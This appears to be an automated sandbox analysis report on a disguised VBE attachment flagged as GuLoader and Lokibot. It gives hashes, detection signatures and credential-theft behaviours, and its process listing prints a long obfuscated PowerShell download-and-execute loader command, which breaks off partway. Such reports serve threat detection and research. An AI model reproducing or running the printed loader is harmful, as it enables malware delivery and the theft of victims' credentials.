Edit tour
Windows
Analysis Report
PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
Overview
General Information
Sample name: | PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vberenamed because original name is a hash value |
Original sample name: | PRORAUNSKA ZAHTEVA 09-30-2024pdf.vbe |
Analysis ID: | 1523160 |
MD5: | ae06697b71084618bb9a2d051f6fad2f |
SHA1: | d3cc11739d47aebc183e425750d53ea0d412c8e0 |
SHA256: | dc6607f4aa63d04407994442f3f085ccd29a2feadac2a791b90cdbcfee2f5fac |
Tags: | Lokivbeuser-abuse_ch |
Infos: | |
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6600 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PRORA #U010cUNSK A ZAHTEVA 09-30-2024 #U00b7pdf. vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 3032 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Kechel Prsidentpo sten Uigen nemsigtigh ederne #>; $Overdista ntly='Inte rfrontal'; <#Gadshill Slaabroks til Delebr ns Porulou s Dolkestd et #>;$Vin duesopstni nger=$host .PrivateDa ta;If ($Vi nduesopstn inger) {$S tedlig++;} function J omfruhinde s($Portera nthus){$Ar uspex=$Ace tnaphthali de+$Porter anthus.Len gth-$Stedl ig;for( $N ytteomraad ers=5;$Nyt teomraader s -lt $Aru spex;$Nytt eomraaders +=6){$Indp resse+=$Po rteranthus [$Nytteomr aaders];}$ Indpresse; }function Electroend osmosis($R ookus){ & ($Bohor) ( $Rookus);} $Dinder=Jo mfruhindes 'Pac iMEn hjroTretiz alkohi.nud elRedillAl fajaFjern/ dopt5She. t. Kaff0 S toi Anf l( fundaWIsla niStra nLe echdHa aro ReshiwF,if isSemiw Un deNStaveTD esti Affi1 .rvty0B my n.Trykk0Di flu;Hi si PolydWCogi ti CypenFo rka6Genda4 Isab; Afs t PresnxM elh6Uno n4 Yello;Fl,t t steorDes p vdanse: Svi 1Subbi 2Fopsc1Low ba.T,mme0C yto )retri Men GAden aeUddancAs semk Raggo Afdo/Excl 2 Til 0Ps amm1Sadle0 Gri 0.usc l1 Me u0 O rg 1 Clay GeskeFPonc hiI,currBu h.seKonomf Y glioKu,s txFusin/F. rsg1Krush2 Demo.1 Fil i.Micro0Ra d o ';$Ame rikanismen s=Jomfruhi ndes ' Br, sUAnpris E iriENedrir Urchi- Sul paFjrteGPr eteEDatabN maritQu r u ';$samls nings=Jomf ruhindes ' FantahIlio st.adbatUn derpTuttis Giral:Gono r/Etho./ K om dZoophr NickiA,ta gv,ubope F ort. Durag HoldnoBrod eoSe,vegSo dallFreefe Helve..ati ocNeph oEl se.mMic,o/ nat ouArto tcReemp?Ri ngoeR asyx O,erhpEcca fo Or arFo rnjtMarli= LselidUdvi koOc.oiw.y nton Snekl InteroM ll ea.erskdPr gr&B.esni Parasd S e t= Bobs1 d ammeAnl gx Ud,rF.loc kxJagtlLSu ddeodec m5 StrstDTo g lnUne p8 c ham7F rsaF le iWHyst eQ ,tiks o vacK hypeO FinanFFork 9RizzaGN nsuFFindi6 RetaiRspil lfModst-Ny oprp UnagH K ipgRadi oXHydroqFe apJ Reap8 Kyste ';$a esthesia=J omfruhinde s 'Proce>N nna ';$Bo hor=Jomfru hindes 'un intIkandiE her iXV,nd f ';$Yamme rs='Breme' ;$rytmiser et='\Drgs. Trs';Elect roendosmos is (Jomfru hindes 'fa tb$Forskg IsoblSpil loKikonbKj er.aspro l nth:Unimp AOkseblFor eilPda oeT russnHess dFemkaesal .t=Begrl$M iljfeMetro n,edriv ri ll:Glosaa P otpSul m p Pja d Ap ioaSukketl ithoaSluse + rdig$Uds kirEnt tyJ entrtHokey mboo.ei ri tis Afvieu n errbaldr eKtex,tsve dj ');Elec troendosmo sis (Jomfr uhindes 'O rigi$Swash gUnderlScy l oTes dbW hitmaPersi lUdtmm:Sva ghTSvrmer La naBo il cOmg dtber aks onox=B evrt$Sa le sOegenaDep onmDipetlS ,agtsRatio nBasiliHgh srn Sp cg. nifosPhilo .Tilsks Pe rsp KliplT idspi Viva tOpryk(Tre ,j$Sty taE xen.e Roma s dvlgt jo llhUdladeU dmatsUntem i eardaUni vo)Cre,s ' );Electroe ndosmosis (Jomfruhin des 'Scot. [KikseNAed eseSkonstL illi.Re is SSkanke ej skr Stenv